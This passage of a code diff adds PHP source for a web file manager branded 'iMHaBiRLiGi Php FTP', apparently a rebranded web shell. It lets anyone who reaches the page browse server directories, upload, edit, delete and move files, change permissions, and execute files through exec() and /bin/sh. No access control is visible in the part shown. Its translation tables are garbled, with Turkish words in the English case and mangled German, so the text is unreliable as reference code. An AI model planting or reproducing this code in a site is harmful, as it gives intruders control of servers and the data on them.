+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
+	if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n";
+
+	if (!$win) {
+
+		if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n";
+
+		if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = '';
+		echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n";
+
+	}
+
+	echo '	<th class="Görevler">' . word('Görevler') . '</th>
+</tr>
+';
+
+	for ($i = 0; $i < sizeof($list); $i++) {
+		$file = $list[$i];
+
+		$timestamps  = 'mtime: ' . date($date_format, $file['mtime']) . ', ';
+		$timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', ';
+		$timestamps .= 'ctime: ' . date($date_format, $file['ctime']);
+
+		echo '<tr class="listing">
+	<td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td>
+	<td class="filename" title="' . html($timestamps) . '">';
+
+		if ($file['is_link']) {
+
+			echo '<img src="' . $self . '?image=link" alt="link" /> ';
+			echo html($file['filename']) . ' &rarr; ';
+
+			$real_file = relative2absolute($file['target'], $directory);
+
+			if (@is_readable($real_file)) {
+				if (@is_dir($real_file)) {
+					echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]';
+				} else {
+					echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>';
+				}
+			} else {
+				echo html($file['target']);
+			}
+
+		} elseif ($file['is_dir']) {
+
+			echo '<img src="' . $self . '?image=folder" alt="folder" /> [ ';
+			if ($win || $file['is_executable']) {
+				echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+			echo ' ]';
+
+		} else {
+
+			if (substr($file['filename'], 0, 1) == '.') {
+				echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> ';
+			} else {
+				echo '<img src="' . $self . '?image=file" alt="file" /> ';
+			}
+
+			if ($file['is_file'] && $file['is_readable']) {
+			   echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>';
+			} else {
+				echo html($file['filename']);
+			}
+
+		}
+
+		if ($file['size'] >= 1000) {
+			$human = ' title="' . human_filesize($file['size']) . '"';
+		} else {
+			$human = '';
+		}
+
+		echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n";
+
+		if (!$win) {
+
+			echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">';
+
+			$l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid());
+			if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">';
+			echo html(permission_octal2string($file['permission']));
+			if ($l) echo '</a>';
+
+			echo "</td>\n";
+
+			if (array_key_exists('owner_name', $file)) {
+				echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"owner\">{$file['owner']}</td>\n";
+			}
+
+			if (array_key_exists('group_name', $file)) {
+				echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n";
+			} else {
+				echo "\t<td class=\"group\">{$file['group']}</td>\n";
+			}
+
+		}
+
+		echo '	<td class="Görevler">
+		<input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" />
+';
+
+		$actions = array();
+		if (function_exists('symlink')) {
+			$actions[] = 'create_symlink';
+		}
+		if (@is_writable(dirname($file['path']))) {
+			$actions[] = 'Sil';
+			$actions[] = 'Degistir';
+			$actions[] = 'Tasi';
+		}
+		if ($file['is_file'] && $file['is_readable']) {
+			$actions[] = 'Kopyala';
+			$actions[] = 'indir';
+			if ($file['is_writable']) $actions[] = 'Düzenle';
+		}
+		if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) {
+			$actions[] = 'execute';
+		}
+
+		if (sizeof($actions) > 0) {
+
+			echo '		<select class="small" name="action' . $i . '" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+			foreach ($actions as $action) {
+				echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+			}
+
+			echo '		</select>
+		<input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" />
+';
+
+		}
+
+		echo '	</td>
+</tr>
+';
+
+	}
+
+	echo '<tr class="listing_footer">
+	<td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td>
+	<td colspan="' . ($cols - 1) . '">
+		<input type="hidden" name="num" value="' . sizeof($list) . '" />
+		<input type="hidden" name="focus" value="" />
+		<input type="hidden" name="olddir" value="' . html($directory) . '" />
+';
+
+	$actions = array();
+	if (@is_writable(dirname($file['path']))) {
+		$actions[] = 'Sil';
+		$actions[] = 'Tasi';
+	}
+	$actions[] = 'Kopyala';
+
+	echo '		<select class="small" name="action_all" size="1">
+		<option value="">' . str_repeat('&nbsp;', 30) . '</option>
+';
+
+	foreach ($actions as $action) {
+		echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n";
+	}
+
+	echo '		</select>
+		<input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function directory_choice () {
+	global $directory, $homedir, $cols, $self;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="directory">
+		<a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>:
+		<input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" />
+		<input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" />
+	</td>
+</tr>
+';
+
+}
+
+function upload_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="upload">
+		' . word('file') . ':
+		<input type="file" name="upload" onfocus="activate(\'other\')" />
+		<input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" />
+	</td>
+</tr>
+';
+
+}
+
+function create_box () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" id="create">
+		<select name="create_type" size="1" onfocus="activate(\'create\')">
+		<option value="file">' . word('file') . '</option>
+		<option value="directory">' . word('directory') . '</option>
+		</select>
+		<input type="text" name="create_name" onfocus="activate(\'create\')" />
+		<input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" />
+	</td>
+</tr>
+';
+
+}
+
+function Düzenle ($file) {
+	global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess;
+
+	html_header();
+
+	echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2>
+
+<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">';
+
+	if (array_key_exists('content', $_POST)) {
+		echo $_POST['content'];
+	} else {
+		$f = fopen($file, 'r');
+		while (!feof($f)) {
+			echo html(fread($f, 8192));
+		}
+		fclose($f);
+	}
+
+	if (!empty($_POST['user'])) {
+		echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']);
+	}
+	if (!empty($_POST['basic_auth'])) {
+		if ($win) {
+			$authfile = str_replace('\\', '/', $directory) . $htpasswd;
+		} else {
+			$authfile = $directory . $htpasswd;
+		}
+		echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n";
+		echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n";
+		echo 'Require valid-user';
+	}
+
+	echo '</textarea>
+
+	<hr />
+';
+
+	if ($apache && basename($file) == $htpasswd) {
+		echo '
+	' . word('user') . ': <input type="text" name="user" />
+	' . word('password') . ': <input type="password" name="password" />
+	<input type="submit" value="' . word('add') . '" />
+
+	<hr />
+';
+
+	}
+
+	if ($apache && basename($file) == $htaccess) {
+		echo '
+	<input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" />
+
+	<hr />
+';
+
+	}
+
+	echo '
+	<input type="hidden" name="action" value="Düzenle" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<input type="reset" value="' . word('reset') . '" id="red_button" />
+	<input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function spacer () {
+	global $cols;
+
+	echo '<tr>
+	<td colspan="' . $cols . '" style="height: 1em"></td>
+</tr>
+';
+
+}
+
+function textfieldsize ($content) {
+
+	$size = strlen($content) + 5;
+	if ($size < 30) $size = 30;
+
+	return $size;
+
+}
+
+function request_dump () {
+
+	foreach ($_REQUEST as $key => $value) {
+		echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n";
+	}
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function html ($string) {
+	global $charset;
+	return htmlentities($string, ENT_COMPAT, $charset);
+}
+
+function word ($word) {
+	global $words, $word_charset;
+	return htmlentities($words[$word], ENT_COMPAT, $word_charset);
+}
+
+function phrase ($phrase, $arguments) {
+	global $words;
+	static $search;
+
+	if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i";
+
+	for ($i = 0; $i < sizeof($arguments); $i++) {
+		$arguments[$i] = nl2br(html($arguments[$i]));
+	}
+
+	$replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>');
+
+	return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase]))));
+
+}
+
+function getwords ($lang) {
+	global $word_charset, $date_format;
+
+	switch ($lang) {
+	case 'de':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Verzeichnis',
+'file' => 'Datei',
+'filename' => 'Dateiname',
+
+'size' => 'Größe',
+'permission' => 'Rechte',
+'owner' => 'Eigner',
+'group' => 'Gruppe',
+'other' => 'Andere',
+'Görevler' => 'Funktionen',
+
+'read' => 'lesen',
+'write' => 'schreiben',
+'execute' => 'ausführen',
+
+'create_symlink' => 'Symlink erstellen',
+'Sil' => 'löschen',
+'Degistir' => 'umbenennen',
+'Tasi' => 'verschieben',
+'Kopyala' => 'kopieren',
+'Düzenle' => 'Düzenleieren',
+'indir' => 'herunterladen',
+'upload' => 'hochladen',
+'create' => 'erstellen',
+'change' => 'wechseln',
+'save' => 'speichern',
+'set' => 'setze',
+'reset' => 'zurücksetzen',
+'relative' => 'Pfad zum Ziel relativ',
+
+'yes' => 'Ja',
+'no' => 'Nein',
+'Geri' => 'zurück',
+'Yol' => 'Ziel',
+'symlink' => 'Symbolischer Link',
+'no_output' => 'keine Ausgabe',
+
+'user' => 'Benutzername',
+'password' => 'Kennwort',
+'add' => 'hinzufügen',
+'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen',
+
+'uploaded' => '"[%1]" wurde hochgeladen.',
+'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.',
+'already_exists' => '"[%1]" existiert bereits.',
+'created' => '"[%1]" wurde erstellt.',
+'not_created' => '"[%1]" konnte nicht erstellt werden.',
+'really_Sil' => 'Sollen folgende Dateien wirklich gelöscht werden?',
+'Sild' => "Folgende Dateien wurden gelöscht:\n[%1]",
+'not_Sild' => "Folgende Dateien konnten nicht gelöscht werden:\n[%1]",
+'Degistir_file' => 'Benenne Datei um:',
+'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.',
+'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.',
+'Tasi_files' => 'Verschieben folgende Dateien:',
+'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]",
+'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]",
+'Kopyala_files' => 'Kopiere folgende Dateien:',
+'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]",
+'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]",
+'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.',
+'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}",
+'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}",
+'saved' => '"[%1]" wurde gespeichert.',
+'not_saved' => '"[%1]" konnte nicht gespeichert werden.',
+'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.',
+'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.',
+'permission_for' => 'Rechte für "[%1]":',
+'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.',
+'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.',
+'not_readable' => '"[%1]" kann nicht gelesen werden.'
+		);
+
+	case 'fr':
+
+		$date_format = 'd.m.y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Répertoire',
+'file' => 'Fichier',
+'filename' => 'Nom fichier',
+
+'size' => 'Taille',
+'permission' => 'Droits',
+'owner' => 'Propriétaire',
+'group' => 'Groupe',
+'other' => 'Autres',
+'Görevler' => 'Fonctions',
+
+'read' => 'Lire',
+'write' => 'Ecrire',
+'execute' => 'Exécuter',
+
+'create_symlink' => 'Créer lien symbolique',
+'Sil' => 'Effacer',
+'Degistir' => 'Renommer',
+'Tasi' => 'Déplacer',
+'Kopyala' => 'Copier',
+'Düzenle' => 'Ouvrir',
+'indir' => 'Télécharger sur PC',
+'upload' => 'Télécharger sur serveur',
+'create' => 'Créer',
+'change' => 'Changer',
+'save' => 'Sauvegarder',
+'set' => 'Exécuter',
+'reset' => 'Réinitialiser',
+'relative' => 'Relatif',
+
+'yes' => 'Oui',
+'no' => 'Non',
+'Geri' => 'Retour',
+'Yol' => 'Yol',
+'symlink' => 'Lien symbollique',
+'no_output' => 'Pas de sortie',
+
+'user' => 'Utilisateur',
+'password' => 'Mot de passe',
+'add' => 'Ajouter',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" a été téléchargé sur le serveur.',
+'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.',
+'already_exists' => '"[%1]" existe déjà.',
+'created' => '"[%1]" a été créé.',
+'not_created' => '"[%1]" n a pas pu être créé.',
+'really_Sil' => 'Effacer le fichier?',
+'Sild' => "Ces fichiers ont été détuits:\n[%1]",
+'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]",
+'Degistir_file' => 'Renomme fichier:',
+'Degistird' => '"[%1]" a été renommé en "[%2]".',
+'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".',
+'Tasi_files' => 'Déplacer ces fichiers:',
+'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]",
+'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copier ces fichiers:',
+'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]",
+'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" ne peut être ouvert.',
+'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}",
+'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}",
+'saved' => '"[%1]" a été sauvegardé.',
+'not_saved' => '"[%1]" n a pas pu être sauvegardé.',
+'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.',
+'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.',
+'permission_for' => 'Droits de "[%1]":',
+'permission_set' => 'Droits de "[%1]" ont été changés en [%2].',
+'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].',
+'not_readable' => '"[%1]" ne peut pas être ouvert.'
+		);
+
+	case 'it':
+
+		$date_format = 'd-m-Y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Directory',
+'file' => 'File',
+'filename' => 'Nome File',
+
+'size' => 'Dimensioni',
+'permission' => 'Permessi',
+'owner' => 'Proprietario',
+'group' => 'Gruppo',
+'other' => 'Altro',
+'Görevler' => 'Funzioni',
+
+'read' => 'leggi',
+'write' => 'scrivi',
+'execute' => 'esegui',
+
+'create_symlink' => 'crea link simbolico',
+'Sil' => 'cancella',
+'Degistir' => 'rinomina',
+'Tasi' => 'sposta',
+'Kopyala' => 'copia',
+'Düzenle' => 'modifica',
+'indir' => 'indir',
+'upload' => 'upload',
+'create' => 'crea',
+'change' => 'cambia',
+'save' => 'salva',
+'set' => 'imposta',
+'reset' => 'reimposta',
+'relative' => 'Percorso relativo per la destinazione',
+
+'yes' => 'Si',
+'no' => 'No',
+'Geri' => 'indietro',
+'Yol' => 'Destinazione',
+'symlink' => 'Link simbolico',
+'no_output' => 'no output',
+
+'user' => 'User',
+'password' => 'Password',
+'add' => 'aggiungi',
+'add_basic_auth' => 'aggiungi autenticazione base',
+
+'uploaded' => '"[%1]" è stato caricato.',
+'not_uploaded' => '"[%1]" non è stato caricato.',
+'already_exists' => '"[%1]" esiste già.',
+'created' => '"[%1]" è stato creato.',
+'not_created' => '"[%1]" non è stato creato.',
+'really_Sil' => 'Cancello questi file ?',
+'Sild' => "Questi file sono stati cancellati:\n[%1]",
+'not_Sild' => "Questi file non possono essere cancellati:\n[%1]",
+'Degistir_file' => 'File rinominato:',
+'Degistird' => '"[%1]" è stato rinominato in "[%2]".',
+'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".',
+'Tasi_files' => 'Sposto questi file:',
+'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]",
+'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Copio questi file',
+'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]",
+'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" non può essere modificato.',
+'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}",
+'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}",
+'saved' => '"[%1]" è stato salvato.',
+'not_saved' => '"[%1]" non è stato salvato.',
+'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.',
+'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.',
+'permission_for' => 'Permessi di "[%1]":',
+'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].',
+'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].',
+'not_readable' => '"[%1]" non può essere letto.'
+		);
+
+	case 'se':
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+ 
+		return array(
+'directory' => 'Mapp',
+'file' => 'Fil',
+'filename' => 'Filnamn',
+ 
+'size' => 'Storlek',
+'permission' => 'Säkerhetsnivå',
+'owner' => 'Ägare',
+'group' => 'Grupp',
+'other' => 'Andra',
+'Görevler' => 'Funktioner',
+ 
+'read' => 'Läs',
+'write' => 'Skriv',
+'execute' => 'Utför',
+ 
+'create_symlink' => 'Skapa symlink',
+'Sil' => 'Radera',
+'Degistir' => 'Byt namn',
+'Tasi' => 'Flytta',
+'Kopyala' => 'Kopiera',
+'Düzenle' => 'Ändra',
+'indir' => 'Ladda ner',
+'upload' => 'Ladda upp',
+'create' => 'Skapa',
+'change' => 'Ändra',
+'save' => 'Spara',
+'set' => 'Markera',
+'reset' => 'Töm',
+'relative' => 'Relative path to target',
+ 
+'yes' => 'Ja',
+'no' => 'Nej',
+'Geri' => 'Tillbaks',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'no output',
+ 
+'user' => 'Användare',
+'password' => 'Lösenord',
+'add' => 'Lägg till',
+'add_basic_auth' => 'add basic-authentification',
+ 
+'uploaded' => '"[%1]" har laddats upp.',
+'not_uploaded' => '"[%1]" kunde inte laddas upp.',
+'already_exists' => '"[%1]" finns redan.',
+'created' => '"[%1]" har skapats.',
+'not_created' => '"[%1]" kunde inte skapas.',
+'really_Sil' => 'Radera dessa filer?',
+'Sild' => "De här filerna har raderats:\n[%1]",
+'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]",
+'Degistir_file' => 'Byt namn på fil:',
+'Degistird' => '"[%1]" har bytt namn till "[%2]".',
+'not_Degistird' => '"[%1] kunde inte döpas om till "[%2]".',
+'Tasi_files' => 'Flytta dessa filer:',
+'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
+'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Kopiera dessa filer:',
+'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
+'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
+'not_Düzenleed' => '"[%1]" kan inte ändras.',
+'executed' => "\"[%1]\" har utförts:\n{%2}",
+'not_executed' => "\"[%1]\" kunde inte utföras:\n{%2}",
+'saved' => '"[%1]" har sparats.',
+'not_saved' => '"[%1]" kunde inte sparas.',
+'symlinked' => 'Symlink från "[%2]" till "[%1]" har skapats.',
+'not_symlinked' => 'Symlink från "[%2]" till "[%1]" kunde inte skapas.',
+'permission_for' => 'Rättigheter för "[%1]":',
+'permission_set' => 'Rättigheter för "[%1]" ändrades till [%2].',
+'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
+'not_readable' => '"[%1]" kan inte läsas.'
+		);
+
+	case 'en':
+	default:
+
+		$date_format = 'n/j/y H:i:s';
+		$word_charset = 'ISO-8859-1';
+
+		return array(
+'directory' => 'Düzergah',
+'file' => 'Dosya',
+'filename' => 'DosyaAdi',
+
+'size' => 'Boyut',
+'permission' => 'izin',
+'owner' => 'Sahip',
+'group' => 'Grup',
+'other' => 'Diğerleri',
+'Görevler' => 'Görevler',
+
+'read' => 'Oku',
+'write' => 'Yaz',
+'execute' => 'Uygula',
+
+'create_symlink' => 'create symlink',
+'Sil' => 'Sil',
+'Degistir' => 'Degistir',
+'Tasi' => 'Tasi',
+'Kopyala' => 'Kopyala',
+'Düzenle' => 'Düzenle',
+'indir' => 'indir',
+'upload' => 'Yükle',
+'create' => 'Olustur',
+'change' => 'Degisiklik',
+'save' => 'Kaydet',
+'set' => 'Koyulan',
+'reset' => 'Yenile',
+'relative' => 'Hedefe Yolla',
+
+'yes' => 'Evet',
+'no' => 'Hayir',
+'Geri' => 'Geri',
+'Yol' => 'Yol',
+'symlink' => 'Symlink',
+'no_output' => 'Hiçbir çıktı',
+
+'user' => 'Kullanıcı',
+'password' => 'Sifre',
+'add' => 'Ekle',
+'add_basic_auth' => 'add basic-authentification',
+
+'uploaded' => '"[%1]" Yüklendi.',
+'not_uploaded' => '"[%1]" Yüklenemedi.',
+'already_exists' => '"[%1]" Şimdiden var ol.',
+'created' => '"[%1]" Olusturuldu.',
+'not_created' => '"[%1]" Olusturuldu.',
+'really_Sil' => 'Silinen dosyalar?',
+'Sild' => "Bu dosyalar,oldu Sild:\n[%1]",
+'not_Sild' => "Bu dosyalar olamazdı Sild:\n[%1]",
+'Degistir_file' => 'Dosyayi Degistir:',
+'Degistird' => '"[%1]" Degistirildi "[%2]".',
+'not_Degistird' => '"[%1] Degistirilemedi "[%2]".',
+'Tasi_files' => 'Dosyayi TAsi:',
+'Tasid' => "Bu Dosyalar Tasindi \"[%2]\":\n[%1]",
+'not_Tasid' => "Bu Dosyalar Tasinamaz \"[%2]\":\n[%1]",
+'Kopyala_files' => 'Bu Dosyalari Kopyala:',
+'copied' => "Bu Dosyalar Kopyalanir \"[%2]\":\n[%1]",
